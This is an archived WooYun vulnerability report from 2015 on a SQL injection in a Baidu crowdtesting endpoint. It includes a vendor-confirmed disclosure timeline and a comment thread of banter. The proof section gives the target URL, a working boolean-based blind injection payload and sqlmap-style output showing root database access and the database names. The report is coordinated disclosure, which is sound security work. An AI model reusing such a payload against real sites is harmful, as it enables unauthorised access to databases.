当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158328

漏洞标题:百度某站存在SQL注射漏洞ROOT权限

相关厂商:百度

漏洞作者: 紫霞仙子

提交时间:2015-12-04 17:57

修复时间:2016-01-21 15:30

公开时间:2016-01-21 15:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-04: 细节已通知厂商并且等待厂商处理中
2015-12-07: 厂商已经确认,细节仅向厂商公开
2015-12-17: 细节向核心白帽子及相关领域专家公开
2015-12-27: 细节向普通白帽子公开
2016-01-06: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

在测试工具,效果还行。^_^
--------------------------------
#唐朝第一次#唐朝安全巡航发布会来袭!!!
12月16号,798秀剧场,不见不散!
活动报名页面:http://www.huodongxing.com/event/9311150532600
-----------------------------------

详细说明:

http://test.baidu.com/crowdtest/n/userLabel/openPlane (POST)
except_label_ids=&YII_CSRF_TOKEN=

漏洞证明:

---
Parameter: except_label_ids (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: except_label_ids=-1823) OR 9214=9214 AND (7202=7202&YII_CSRF_TOKEN=b2a372d95b23a82c96b413253c9597a172f31e4c
---
web application technology: Apache
back-end DBMS: MySQL 5
current user:    'root@%'
current user is DBA:    True
available databases [9]:
[*] cardsafe
[*] config
[*] crowd_test
[*] hardware
[*] information_schema
[*] mysql
[*] performance_schema
[*] realtime
[*] test

修复方案:

~~~~

版权声明:转载请注明来源 紫霞仙子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-12-07 15:25

厂商回复:

噶捏关注百度安全

最新状态:

暂无

漏洞评价:

评价

  1. 2015-12-04 17:58 | 心云 ( 普通白帽子 | Rank:184 漏洞数:57 | Rank:200 漏洞数:55 | Rank:300 漏洞数:70 ...)

    666666666666666666

  2. 2015-12-04 17:58 | hecate ( 普通白帽子 | Rank:719 漏洞数:107 | ®高级安全工程师 | WooYun认证√)

    是 GourdScan吗

  3. 2015-12-04 18:01 | 紫霞仙子 认证白帽子 ( 普通白帽子 | Rank:2223 漏洞数:301 | 天天向上 !!!)

    @hecate GourdScan还没用过。

  4. 2015-12-04 18:01 | whynot ( 普通白帽子 | Rank:536 漏洞数:98 | 为你解冻冰河 为你放弃世界有何不可)

    绝对是专业的

  5. 2015-12-04 18:12 | 玉林嘎 认证白帽子 ( 核心白帽子 | Rank:900 漏洞数:105 )

    这广告满分

  6. 2015-12-04 18:18 | 紫霞仙子 认证白帽子 ( 普通白帽子 | Rank:2223 漏洞数:301 | 天天向上 !!!)

    @玉林嘎 我靠,888,这么屌

  7. 2015-12-04 18:48 | boooooom 认证白帽子 ( 普通白帽子 | Rank:473 漏洞数:51 | 我有一个好想法!)

    666,话说谁请你来打广告的,这么666

  8. 2015-12-04 18:53 | hecate ( 普通白帽子 | Rank:719 漏洞数:107 | ®高级安全工程师 | WooYun认证√)

    @boooooom 经理好

  9. 2015-12-04 21:05 | 偶然 ( 普通白帽子 | Rank:187 漏洞数:46 | 我是天空里一片云。)

    注意,这边又射了,,求神器

  10. 2015-12-05 11:41 | Mark0smith ( 实习白帽子 | Rank:99 漏洞数:36 )

    紫霞仙子好强

  11. 2015-12-05 14:09 | px1624 ( 普通白帽子 | Rank:1072 漏洞数:180 | px1624)

    你已经去乌云了?

  12. 2015-12-05 20:16 | MAX丶 ( 路人 | Rank:20 漏洞数:5 | 人生路上总有一些不顺心的事情,让我们跳过...)

    666666

  13. 2015-12-07 15:46 | DloveJ ( 普通白帽子 | Rank:1184 漏洞数:212 | Web安全测试培训 QQ269787775)

    这波广告我给99分,另外一分是怕你骄傲:)

  14. 2015-12-07 15:57 | 紫霞仙子 认证白帽子 ( 普通白帽子 | Rank:2223 漏洞数:301 | 天天向上 !!!)

    @DloveJ 不骄不躁,感谢大家!

  15. 2015-12-08 00:29 | 盛大在线(乌云厂商)

    不用工具也能找注入

  16. 2015-12-29 11:10 | 紫霞仙子 认证白帽子 ( 普通白帽子 | Rank:2223 漏洞数:301 | 天天向上 !!!)

    额,是谁wb花不完了?

  17. 2016-01-21 15:42 | 404notfound ( 普通白帽子 | Rank:157 漏洞数:48 | 天朝教育网杀神)

    好好学习